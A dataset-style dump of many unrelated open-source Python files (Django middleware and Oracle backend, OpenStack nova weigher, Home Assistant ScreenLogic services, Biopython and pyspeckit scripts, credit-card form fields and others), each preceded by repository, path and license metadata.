start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
with self.asse
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/cells/weights/ram_by_instance_type.py
|
Python
|
gpl-2.0
| 1,971
| 0
|
# Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Weigh cells by memory needed in a
|
way that spreads instances.
"""
from oslo.config import cfg
from nova.cells import weights
ram_weigher_opts = [
cfg.FloatOpt('ram_weight_multiplier',
default=10.0,
help='Multiplier used for weighing ram. Negative '
'numbers mean to stack vs spread.'),
]
CONF = cfg.CONF
CONF.register_opts(ram_weigher_opts, group='cells')
class RamByInstanceTypeWeigher(weights.BaseCellWeigher):
"""Weigh cells by instance
|
_type requested."""
def weight_multiplier(self):
return CONF.cells.ram_weight_multiplier
def _weigh_object(self, cell, weight_properties):
"""Use the 'ram_free' for a particular instance_type advertised from a
child cell's capacity to compute a weight. We want to direct the
build to a cell with a higher capacity. Since higher weights win,
we just return the number of units available for the instance_type.
"""
request_spec = weight_properties['request_spec']
instance_type = request_spec['instance_type']
memory_needed = instance_type['memory_mb']
ram_free = cell.capacities.get('ram_free', {})
units_by_mb = ram_free.get('units_by_mb', {})
return units_by_mb.get(str(memory_needed), 0)
|
Daishi1223/py-http-realip
|
http_realip/middlewares.py
|
Python
|
mit
| 1,364
| 0.002933
|
from django.conf import settings
from .func import (check_if_trusted,
get_from_X_FORWARDED_FOR as _get_from_xff,
get_from_X_REAL_IP)
trusted_list = (settings.REAL_IP_TRUSTED_LIST
if hasattr(settings, 'REAL_IP_TRUSTED_LIST')
else [])
def get_from_X_FORWARDED_FOR(header):
return _get_from_xff(header, trusted_list)
func_map = {'HTTP_X_REAL_IP': get_from_X_REAL_IP,
'HTTP_X_FORWARDED_FOR': get_from_X_FORWARDED_FOR}
real_ip_headers = (settings.REAL_IP_HEADERS
if hasattr(settings, 'REAL_IP_HEADERS')
else ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR'])
class DjangoRealIPMiddleware(object):
def process_r
|
equest(self, request):
if not check_if_trusted(request.META['REMOTE_ADDR'], trusted_list):
# Only header from trusted ip can be used
return
for header_name in real_ip_headers:
try:
# Get the parsing function
func = func_map[header_name]
# Get the header value
header = request.META[header_name]
except KeyError:
contin
|
ue
# Parse the real ip
real_ip = func(header)
if real_ip:
request.META['REMOTE_ADDR'] = real_ip
break
|
HBEE/odoo-addons
|
project_analytic_integration/__openerp__.py
|
Python
|
agpl-3.0
| 1,908
| 0.002096
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty
|
of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####
|
##########################################################################
{
'name': 'Project and Analytic Account integration impprovements',
'version': '8.0.1.0.0',
'category': 'Projects & Services',
'sequence': 14,
'summary': '',
'description': """
Project and Analytic Account integration impprovements.
=======================================================
Adds domains restriction to project task so that only projets that use task and are not in cancelled, done or tempalte state, can be choosen.
Adds domains restriction to timesheet records so that only
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'project_timesheet',
'hr_timesheet_invoice',
],
'data': [
'project_timesheet_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
skywalka/splunk-for-nagios
|
bin/livehostsdownstatus.py
|
Python
|
gpl-3.0
| 1,840
| 0.044565
|
# Script to request hosts with DOWN status and total hosts by accessing MK Livestatus
# Required field to be passed to this script from Splunk: n/a
import socket,string,sys,re,splunk.Intersplunk,mklivestatus
results = []
try:
results,dummyresults,settings = splunk.Intersplunk.getOrganizedResults()
for r in results:
try:
HOST = mklivestatus.HOST
PORT = mklivestatus.PORT
s = None
livehostsdown = 0
livehoststotal = 0
for h in HOST:
content = [ "GET hosts\nStats: state = 1\nStats: state != 9999\n" ]
|
query = "".join(content)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, PORT))
except socket.error, (value,message):
if s:
s.close()
#Error: Could not open socket: connection refused (MK Livestatus not setup in xinetd?)
break
s.send(query)
s.shutdown(socket.SHUT_WR)
data = s.recv(100000000)
data2 = (re.findall(r'(No UNIX socket)', data))
if data2:
#Error: MK
|
Livestatus module not loaded?
s.close()
else:
livehosts2 = data.strip()
livehosts = livehosts2.split(";")
s.close()
livehostsdownind = int(livehosts[0])
livehoststotalind = int(livehosts[1])
livehostsdown = livehostsdown + livehostsdownind
livehoststotal = livehoststotal + livehoststotalind
r["livehostsdownstatus"] = livehostsdown
r["livehoststotalstatus"] = livehoststotal
except:
r["livehostsdownstatus"] = "0"
r["livehoststotalstatus"] = "0"
except:
import traceback
stack = traceback.format_exc()
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
splunk.Intersplunk.outputResults( results )
|
jpinedaf/pyspeckit
|
examples/example_pNH2D.py
|
Python
|
mit
| 1,329
| 0.017306
|
import pyspeckit
import os
from pyspeckit.spectrum.models
|
import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.down
|
load_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
# Load the spectrum
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
# Determine rms from line free section and load into cube
rms = np.std(spec.data[10:340])
spec.error[:] = rms
# setup spectral axis
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
# define useful shortcuts for True and False
F=False
T=True
# Setup of matplotlib
import matplotlib.pyplot as plt
plt.ion()
# Add NH2D fitter
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
# run spectral fit using some reasonable guesses
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
# plot best fit
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
#save figure
plt.savefig('example_p-NH2D.png')
|
Serulab/Py4Bio
|
code/ch20/estimateintrons.py
|
Python
|
mit
| 4,302
| 0.006044
|
#!/usr/bin/env python
im
|
port argparse
import os
import sqlite3
from Bio import SeqIO, SeqRecord, Seq
from Bio.Align.Applications import ClustalwCommandline
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline as bn
from Bio import AlignIO
AT_DB_FILE = 'AT.db'
BLAST_EXE = '~/opt/ncbi-blast-2.6.0+/bin/blastn'
BLAST_DB = '~/opt/ncbi-blast-2.6.0+/db/TAIR10'
CLUSTALW_EXE =
|
'../../clustalw2'
def allgaps(seq):
"""Return a list with tuples containing all gap positions
and length. seq is a string."""
gaps = []
indash = False
for i, c in enumerate(seq):
if indash is False and c == '-':
c_ini = i
indash = True
dashn = 0
elif indash is True and c == '-':
dashn += 1
elif indash is True and c != '-':
indash = False
gaps.append((c_ini, dashn+1))
return gaps
def iss(user_seq):
"""Infer Splicing Sites from a FASTA file full of EST
sequences"""
with open('forblast','w') as forblastfh:
forblastfh.write(str(user_seq.seq))
blastn_cline = bn(cmd=BLAST_EXE, query='forblast',
db=BLAST_DB, evalue='1e-10', outfmt=5,
num_descriptions='1',
num_alignments='1', out='outfile.xml')
blastn_cline()
b_record = NCBIXML.read(open('outfile.xml'))
title = b_record.alignments[0].title
sid = title[title.index(' ')+1 : title.index(' |')]
# Polarity information of returned sequence.
# 1 = normal, -1 = reverse.
frame = b_record.alignments[0].hsps[0].frame[1]
# Run the SQLite query
conn = sqlite3.connect(AT_DB_FILE)
c = conn.cursor()
res_cur = c.execute('SELECT CDS, FULL_SEQ from seq '
'WHERE ID=?', (sid,))
cds, full_seq = res_cur.fetchone()
if cds=='':
print('There is no matching CDS')
exit()
# Check sequence polarity.
sidcds = '{0}-CDS'.format(sid)
sidseq = '{0}-SEQ'.format(sid)
if frame==1:
seqCDS = SeqRecord.SeqRecord(Seq.Seq(cds),
id = sidcds,
name = '',
description = '')
fullseq = SeqRecord.SeqRecord(Seq.Seq(full_seq),
id = sidseq,
name='',
description='')
else:
seqCDS = SeqRecord.SeqRecord(
Seq.Seq(cds).reverse_complement(),
id = sidcds, name='', description='')
fullseq = SeqRecord.SeqRecord(
Seq.Seq(full_seq).reverse_complement(),
id = sidseq, name = '', description='')
# A tuple with the user sequence and both AT sequences
allseqs = (record, seqCDS, fullseq)
with open('foralig.txt','w') as trifh:
# Write the file with the three sequences
SeqIO.write(allseqs, trifh, 'fasta')
# Do the alignment:
outfilename = '{0}.aln'.format(user_seq.id)
cline = ClustalwCommandline(CLUSTALW_EXE,
infile = 'foralig.txt',
outfile = outfilename,
)
cline()
# Walk over all sequences and look for query sequence
for seq in AlignIO.read(outfilename, 'clustal'):
if user_seq.id in seq.id:
seqstr = str(seq.seq)
gaps = allgaps(seqstr.strip('-'))
break
print('Original sequence: {0}'.format(user_seq.id))
print('\nBest match in AT CDS: {0}'.format(sid))
acc = 0
for i, gap in enumerate(gaps):
print('Putative intron #{0}: Start at position {1}, '
'length {2}'.format(i+1, gap[0]-acc, gap[1]))
acc += gap[1]
print('\n{0}'.format(seqstr.strip('-')))
print('\nAlignment file: {0}\n'.format(outfilename))
description = 'Program to infer intron position based on ' \
'Arabidopsis Thaliana genome'
parser = argparse.ArgumentParser(description=description)
ifh = 'Fasta formated file with sequence to search for introns'
parser.add_argument('input_file', help=ifh)
args = parser.parse_args()
seqhandle = open(args.input_file)
records = SeqIO.parse(seqhandle, 'fasta')
for record in records:
iss(record)
|
rwl/PyCIM
|
CIM15/IEC61970/LoadModel/Season.py
|
Python
|
mit
| 3,209
| 0.002805
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.Element import Element
class Season(Element):
"""A specified time period of the year, e.g., Spring, Summer, Fall, WinterA specified time period of the year, e.g., Spring, Summer, Fall, Winter
"""
def __init__(self, name="winter", startDate='', endDate='', SeasonDayTypeSchedules=None, *args, **kw_args):
"""Initialises a new 'Season' instance.
@param name: Name of the Season Values are: "winter", "summer", "fall", "spring"
@param startDate: Date season starts
@param endDate: Date season ends
@param SeasonDayTypeSchedules: Schedules that use this Season.
"""
#: Name of the Season Values are: "winter", "summer", "fall", "spring"
self.name = name
#: Date season starts
self.startDate = startDate
#: Date season ends
self.endDate = endDate
self._SeasonDayTypeSchedules = []
self.SeasonDayTypeSchedules = [] if SeasonDayTypeSchedules is None else SeasonDayTypeSchedules
super(Season, self).__init__(*args, **kw_args)
_attrs = ["name", "startDate", "endDate"]
_attr_types = {"name": str, "startDate": str, "endDate": str}
_defaults = {"name": "winter", "startDate": '', "endDate": ''}
_enums =
|
{"name": "SeasonName"}
_refs = ["SeasonDayTypeSchedules"]
_many_refs = ["SeasonDayTypeSchedules"]
def getSeasonDayTypeSchedules(self):
"""Schedules that use this Season.
"""
|
return self._SeasonDayTypeSchedules
def setSeasonDayTypeSchedules(self, value):
for x in self._SeasonDayTypeSchedules:
x.Season = None
for y in value:
y._Season = self
self._SeasonDayTypeSchedules = value
SeasonDayTypeSchedules = property(getSeasonDayTypeSchedules, setSeasonDayTypeSchedules)
def addSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = self
def removeSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = None
|
Twinstar2/Python_Master_scripts
|
data_mining/extract_all_targz_in_dir.py
|
Python
|
mit
| 2,292
| 0.004363
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import shutil
import urllib2
from contextlib import closing
from os.path import basename
import gzip
import tarfile
# argparse for information
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--directory", help="input directory")
parser.add_argument("-r", "--remove", action="store_true", help="removes the .gz file after extracting")
args = parser.parse_args()
# sanity check
if not len(sys.argv) > 1:
print "This script extracts all .gz files (not jet .tar) in a given directory, including sub directories."
print "Which directory (including sub directories) would you like to extract?"
parser.print_help()
sys.exit(0)
input = args.directory
# in case of a extraction error, caused by a downloading error, reload the file
def reload_file(file, dirpath):
print "reloading file: " + file
print 'ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file
with closing(urllib2.urlopen('ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file)) as r:
with open(dirpath + "/" + file, 'wb') as reloaded_file:
shutil.copyfileobj(r, reloaded_file)
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
for dirpath, dir, files in os.walk(top=input):
for file in files:
if ".gz" in file:
print "extracting: " + (os.path.join(dirpath, file))
|
try:
|
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
# tar = tarfile.open(os.path.join(dirpath, file))
# tar.extractall(path=dirpath)
# tar.close()
except:
reload_file(file, dirpath)
if args.remove:
os.remove(os.path.join(dirpath, file))
print "Extraction finished"
|
vleo/vleo-notebook
|
test_python/multiprocessing/test_multiprocessing.py
|
Python
|
gpl-3.0
| 811
| 0.014797
|
from multiprocessing import Process,Queue
import os
class TestMP:
def __init__(self,n):
self.n = n
@staticmethod
def worker(q):
"""worker function"""
# print('worker',*args)
# print("ppid= {} pid= {}".format(os.getppid(),os.getpid()))
q.put([1,'x',(os.getpid(),[])])
retu
|
rn
def main(self):
if __name__ == '__main__':
jobs = []
for i in
|
range(self.n):
q = Queue()
p = Process(target=self.worker,args=(q,))
jobs.append((p,q))
p.start()
for i in range(self.n):
j=jobs.pop(0)
j[0].join()
msg = j[1].get()
print("job no {} ended, msg: {}".format(i,msg))
m=TestMP(10)
m.main()
|
Vvucinic/Wander
|
venv_2_7/lib/python2.7/site-packages/Django-1.9-py2.7.egg/django/db/backends/oracle/base.py
|
Python
|
artistic-2.0
| 24,995
| 0.00164
|
"""
Oracle database backend for Django.
Requires cx_Oracle: http://cx-oracle.sourceforge.net/
"""
from __future__ import unicode_literals
import datetime
import decimal
import os
import platform
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.base.validation import BaseDatabaseValidation
from django.utils import six, timezone
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.duration import duration_string
from django.utils.encoding import force_bytes, force_text
from django.utils.functional import cached_property
def _setup_environment(environ):
# Cygwin requires some special voodoo to set the environment variables
# properly so that Oracle will see them.
if platform.system().upper().startswith('CYGWIN'):
try:
import ctypes
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading ctypes: %s; "
"the Oracle backend requires ctypes to "
"operate correctly under Cygwin." % e)
kernel32 = ctypes.CDLL('kernel32')
for name, value in environ:
kernel32.SetEnvironmentVariableA(name, value)
else:
os.environ.update(environ)
_setup_environment([
# Oracle takes client-side character set encoding from the environment.
('NLS_LANG', '.UTF8'),
# This prevents unicode from getting mangled by getting encoded into the
# potentially non-unicode database character set.
('ORA_NCHAR_LITERAL_REPLACE', 'TRUE'),
])
try:
import cx_Oracle as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
# Some of these import cx_Oracle, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .utils import Oracle_datetime, convert_unicode # isort:skip
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
class _UninitializedOperatorsDescriptor(object):
def __get__(self, instance, owner):
# If connection.operators is looked up before a connection has been
# created, transparently initialize connection.operators to avert an
# AttributeError.
if instance is None:
raise AttributeError("operators not available as class attribute")
# Creating a cursor will initialize the operators.
instance.cursor().close()
return instance.__dict__['operators']
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'oracle'
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1)',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'INTERVAL DAY(9) TO SECOND(6)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1)',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11)',
'PositiveSmallIntegerField': 'NUMBER(11)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
'UUIDField': 'VARCHAR2(32)',
}
data_type_check_constraints = {
'BooleanField': '%(qn_column)s IN (0,1)',
'NullBooleanField': '(%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL)',
'PositiveIntegerField': '%(qn_column)s >= 0',
'PositiveSmallIntegerField': '%(qn_column)s >= 0',
}
operators = _UninitializedOperatorsDescriptor()
_standard_operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'icontains': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'endswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'istartswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'iendswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
}
_likec_operators = _standard_operators.copy()
_likec_operators.update({
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
})
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expressi
|
on
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"R
|
EPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')"
_pattern_ops = {
'contains': "'%%' || {} || '%%'",
'icontains': "'%%' || UPPER({}) || '%%'",
'startswith': "{} || '%%'",
'istartswith': "UPPER({}) || '%%'",
'endswith': "'%%' || {}",
'iendswith': "'%%' || UPPER({})",
}
_standard_pattern_ops = {k: "LIKE TRANSLATE( " + v + " USING NCHAR_CS)"
" ESCAPE TRANSLATE('\\' USING NCHAR_CS)"
for k, v in _pattern_ops.items()}
_likec_pattern_ops = {k: "LIKEC " + v + " ESCAPE '\\'"
for k, v in _pattern_ops.items()}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
use_returning_into = self.settings_dict["OPTIONS"].get('use_returning_into', True)
self.features.can_return_id_from_insert = use_returning_into
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _connect_string(self):
settings_dict = sel
|
rohitranjan1991/home-assistant
|
homeassistant/components/screenlogic/services.py
|
Python
|
mit
| 3,148
| 0.001906
|
"""Services for ScreenLogic integration."""
import logging
from screenlogicpy import ScreenLogicError
import voluptuous as vol
from homeassistant.core import HomeAssistant, ServiceCall, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_config_entry_ids
from .const import (
ATTR_COLOR_MODE,
DOMAIN,
SERVICE_SET_COLOR_MODE,
SUPPORTED_COLOR_MODES,
)
_LOGGER = logging.getLogger(__name__)
SET_COLOR_MODE_SCHEMA = cv.make_entity_service_schema(
{
vol.Required(ATTR_COLOR_MODE): vol.In(SUPPORTED_COLOR_MODES),
},
)
@callback
def async_load_screenlogic_services(hass: HomeAssistant):
"""Set up services for the ScreenLogic integration."""
if hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
# Integration-level services have already been added. Return.
return
async def extract_screenlogic_config_entry_ids(service_call: ServiceCall):
return [
entry_id
for entry_id in await async_extract_config_entry_ids(hass, service_call)
if (entry := hass.config_entries.async_get_entry(entry_id))
and entry.domain == DOMAIN
]
async def async_set_color_mode(service_call: ServiceCall) -> None:
if not (
screenlogic_entry_ids := await extract_screenlogic_config_entry_ids(
service_call
)
):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'. Config entry for target not found"
)
color_num = SUPPORTED_COLOR_MODES[service_call.data[ATTR_COLOR_MODE]]
for entry_id in screenlogic_entry_ids:
coordinator = hass.data[DOMAIN][entry_id]
_LOGGER.debug(
"Service %s called on %s with mode %s",
SERVICE_SET_COLOR_MODE,
coordinator.gateway.name,
color_num,
)
try:
if not await coordinator.gateway.async_set_color_lights(color_num):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'"
)
# Debounced refresh to catch any secondary
# changes in the device
await coordinator.async_request_refresh()
except ScreenLogicError as error:
raise HomeAssistantError(error) from error
hass.services.async_register(
DOMAIN, SERVICE_SET_COLOR_MODE, async_set_color_mode, SET_COLOR_MODE_SCHEMA
)
@callback
def async_
|
unload_screenlogic_services(hass: HomeAssistant):
"""Unload services for the ScreenLogic integration."""
if hass.data[DOMAIN]:
# There is still another config entry for this domain, don't remove services.
return
|
if not hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
return
_LOGGER.info("Unloading ScreenLogic Services")
hass.services.async_remove(domain=DOMAIN, service=SERVICE_SET_COLOR_MODE)
|
ddico/odoo
|
addons/website_event/models/website.py
|
Python
|
agpl-3.0
| 491
| 0.004073
|
# -*- coding: utf-8 -*-
# Part of Odo
|
o. See LICENSE file for full copyright and licensing details.
from odoo import models, _
from odoo.addons.http_routing.models.ir_http import url_for
class Website(models.Model):
_inherit = "website"
def get_suggested_controllers(self):
suggested_controllers = super(Website, self).get_suggested_controllers()
suggested_controllers.append((_('E
|
vents'), url_for('/event'), 'website_event'))
return suggested_controllers
|
drimer/NetControl
|
netcontrol/test/util/test_singleton.py
|
Python
|
gpl-2.0
| 593
| 0.001686
|
from unittest import Tes
|
tCase
from netcontrol.util import singleton
@singleton
class SingletonClass(object):
pass
@singleton
class SingletonClassWithAttributes(object):
@classmethod
def setup_attributes(cls):
cls.value = 1
class SingletonTest(TestCase):
def test_that_only_instance_is_created(self):
obj_one = SingletonClass()
obj_two = SingletonClass()
self.assertIs(obj_one, obj_two)
def test_
|
that_instance_is_created_using_setup_method(self):
obj = SingletonClassWithAttributes()
self.assertEqual(1, obj.value)
|
jumoconnect/openjumo
|
jumodjango/etc/credit_card_fields.py
|
Python
|
mit
| 4,687
| 0.00256
|
import re
from datetime import date
from calendar import monthrange, IllegalMonthError
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
# from - https://github.com/bryanchow/django-creditcard-fields
CREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\d{11})$'
MONTH_FORMAT = getattr(settings, 'MONTH_FORMAT', '%b')
VERIFICATION_VALUE_RE = r'^([0-9]{3,4})$'
class CreditCardField(forms.CharField):
"""
Form field that validates credit card numbers.
"""
default_error_messages = {
'required': _(u'Please enter a credit card number.'),
'invalid': _(u'The credit card number you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '').replace('-', '')
if self.required and not value:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(CREDIT_CARD_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
class ExpiryDateWidg
|
et(forms.MultiWidget):
"""
Widget containing two select boxes for selecting the month and year.
"""
def decompress(self, value):
return [value.month, value.year] if value else [None, None]
def format_output(self, rendered_widgets):
return u'<div class="expirydatefield">%s</div>' % ' '.join(rendered_widgets)
class ExpiryDateField(forms.MultiV
|
alueField):
"""
Form field that validates credit card expiry dates.
"""
default_error_messages = {
'invalid_month': _(u'Please enter a valid month.'),
'invalid_year': _(u'Please enter a valid year.'),
'date_passed': _(u'This expiry date has passed.'),
}
def __init__(self, *args, **kwargs):
today = date.today()
error_messages = self.default_error_messages.copy()
if 'error_messages' in kwargs:
error_messages.update(kwargs['error_messages'])
if 'initial' not in kwargs:
# Set default expiry date based on current month and year
kwargs['initial'] = today
months = [(x, '%02d (%s)' % (x, date(2000, x, 1).strftime(MONTH_FORMAT))) for x in xrange(1, 13)]
years = [(x, x) for x in xrange(today.year, today.year + 15)]
fields = (
forms.ChoiceField(choices=months, error_messages={'invalid': error_messages['invalid_month']}),
forms.ChoiceField(choices=years, error_messages={'invalid': error_messages['invalid_year']}),
)
super(ExpiryDateField, self).__init__(fields, *args, **kwargs)
self.widget = ExpiryDateWidget(widgets=[fields[0].widget, fields[1].widget])
def clean(self, value):
expiry_date = super(ExpiryDateField, self).clean(value)
if date.today() > expiry_date:
raise forms.ValidationError(self.error_messages['date_passed'])
return expiry_date
def compress(self, data_list):
if data_list:
try:
month = int(data_list[0])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_month'])
try:
year = int(data_list[1])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_year'])
try:
day = monthrange(year, month)[1] # last day of the month
except IllegalMonthError:
raise forms.ValidationError(self.error_messages['invalid_month'])
except ValueError:
